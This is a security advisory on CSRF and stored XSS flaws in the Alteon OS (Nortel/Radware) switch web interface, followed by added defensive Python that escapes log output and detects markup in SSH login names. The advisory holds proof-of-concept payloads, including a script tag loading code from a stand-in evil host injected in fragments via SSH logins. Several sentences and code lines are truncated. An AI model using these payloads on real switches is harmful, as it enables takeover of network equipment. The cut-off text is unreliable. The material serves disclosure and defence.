[DSECRG-09-062] Alteon OS BBI (Nortel) - Multiple Vulnerabilities
Digital Security Research Group [DSecRG] Advisory
http://dsecrg.com/pages/vul/show.php?id=161

Various XSS and XSRF vulnerabilities were identified in the Alteon OS Browser-Based Interface.

Application: Alteon OS BBI

Description

Browser-Based Interface (BBI) software is included in the Nortel Networks (versions < 25.0.0.0) and Radware

Details:

1) XSRF

An attacker may exploit this issue to perform certain administrative actions,

Example PoC (change banner and apply):

<html>
<title>Nortel XSRF</title>
<script src="http://<Switch>/switchSystem.html/bar?banner=newBanner"></script>
</body>

2) Stored XSS

An attacker may inject 36 bytes of JavaScript code into the log via SSH login

Both vulnerabilities give the attacker a chance to change the switch configuration file or attack the Administrator's

Also, any string parameter in BBI can be used for static XSS.

Example

Create JavaScript code and put it on an evil server (inj.js); this code will

Proof of Concept:

var request = !window.ActiveXObject ? new XMLHttpRequest() : new
//Change banner
request = !window.ActiveXObject ? new XMLHttpRequest() : new
//apply changes
request = !window.ActiveXObject ? new XMLHttpRequest() : new
//Clear log

An attacker can also include this code in the log without using <EvilHost>.

Next step - connect via SSH and inject parts of the code.

Exploit:

alexey@shell#:ssh <NortelSwitch>
login as: <script a="
alexey@shell#:ssh <NortelSwitch>
login as: " src="http://<EvilHost>/inj.js" b="
alexey@shell#:ssh <NortelSwitch>
login as: "></script>

When the administrator looks at the log via BBI, his browser gets the following:

...

Solution:

We have had no answer from Radware for about two months, so we don't know about

Here are our recommendations:

a) Turn off BBI.
/c/sys/access/https/https d

c) Allow access to SSH and BBI only for trusted machines and networks;

References

http://dsecrg.com/pages/vul/show.php?id=161

About

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
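The stored XSS described above exists because the BBI log viewer writes the SSH login name into the page without encoding it, and the advisory's only workaround is to disable or restrict BBI. As an added example that is not part of the DSecRG advisory and is not Nortel or Radware code, the Python below shows the defender's side of the same problem: a log viewer that HTML-escapes every field before rendering, so fragments submitted as login names stay inert text, plus a simple check that flags login-name fields containing markup and counts them per source address, which is what a log-review or SIEM rule for this pattern would look for. The log line format, the sample lines, the hostname and the addresses are all constructed for this example and are not taken from the page.

```python
"""Added example (not from the DSecRG advisory): safe rendering of SSH-login
log entries in a web UI and detection of markup fragments in login names."""
import html
import re
from typing import Dict, List, Optional

# Constructed sample switch log lines (not from the advisory or any real device).
# Everything after "user=" is whatever the SSH client sent as the login name;
# one payload is spread over several short attempts from the same address.
SAMPLE_LOG = [
    "Jan 01 00:00:01 auth: login failed from 10.0.0.5 user=admin",
    'Jan 01 00:00:09 auth: login failed from 10.0.0.5 user=<script a="',
    'Jan 01 00:00:17 auth: login failed from 10.0.0.5 user=" src="http://evil.example/x.js" b="',
    'Jan 01 00:00:25 auth: login failed from 10.0.0.5 user="></script>',
    "Jan 01 00:01:00 auth: login ok from 10.0.0.7 user=operator",
]

# Assumed (constructed) log format: "<ts> auth: login <result> from <src> user=<name>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) auth: login (?P<result>\w+) "
    r"from (?P<src>\S+) user=(?P<user>.*)$"
)

# Characters and tokens that have no place in a login name but are needed to
# build HTML or a script tag once the fragments are concatenated in the log.
MARKUP_RE = re.compile(r'[<>"\']|script|src=', re.IGNORECASE)

FIELDS = ("ts", "result", "src", "user")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def parse_log(lines: List[str]) -> List[Dict[str, str]]:
    """Parse all lines, silently dropping ones that do not match the format."""
    return [e for e in (parse_line(line) for line in lines) if e]


def render_log_html(entries: List[Dict[str, str]]) -> str:
    """Render entries as an HTML table, escaping every field as text.

    html.escape() turns < > & " ' into entities, so a login name that reads
    '<script a="' is displayed literally instead of becoming part of the DOM.
    """
    rows = []
    for e in entries:
        cells = "".join(
            f"<td>{html.escape(e[k], quote=True)}</td>" for k in FIELDS
        )
        rows.append(f"<tr>{cells}</tr>")
    return "<table>" + "".join(rows) + "</table>"


def suspicious_entries(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Entries whose login name contains markup metacharacters or script tokens."""
    return [e for e in entries if MARKUP_RE.search(e["user"])]


def suspicious_by_source(entries: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged login attempts per source address.

    Several flagged attempts from one address in a short window is the
    split-payload pattern: each attempt carries only a piece of the markup.
    """
    counts: Dict[str, int] = {}
    for e in suspicious_entries(entries):
        counts[e["src"]] = counts.get(e["src"], 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    print(render_log_html(parsed))
    for src, n in suspicious_by_source(parsed).items():
        print(f"{src}: {n} login attempts carrying markup")
```

The escaping in `render_log_html` is the fix the page's BBI lacks: the log field is treated as data, never as HTML. The per-source count is deliberately crude; in practice it would be paired with a time window and an alert threshold, but even this form catches the split payload because every fragment must contain at least one of the characters the regex looks for.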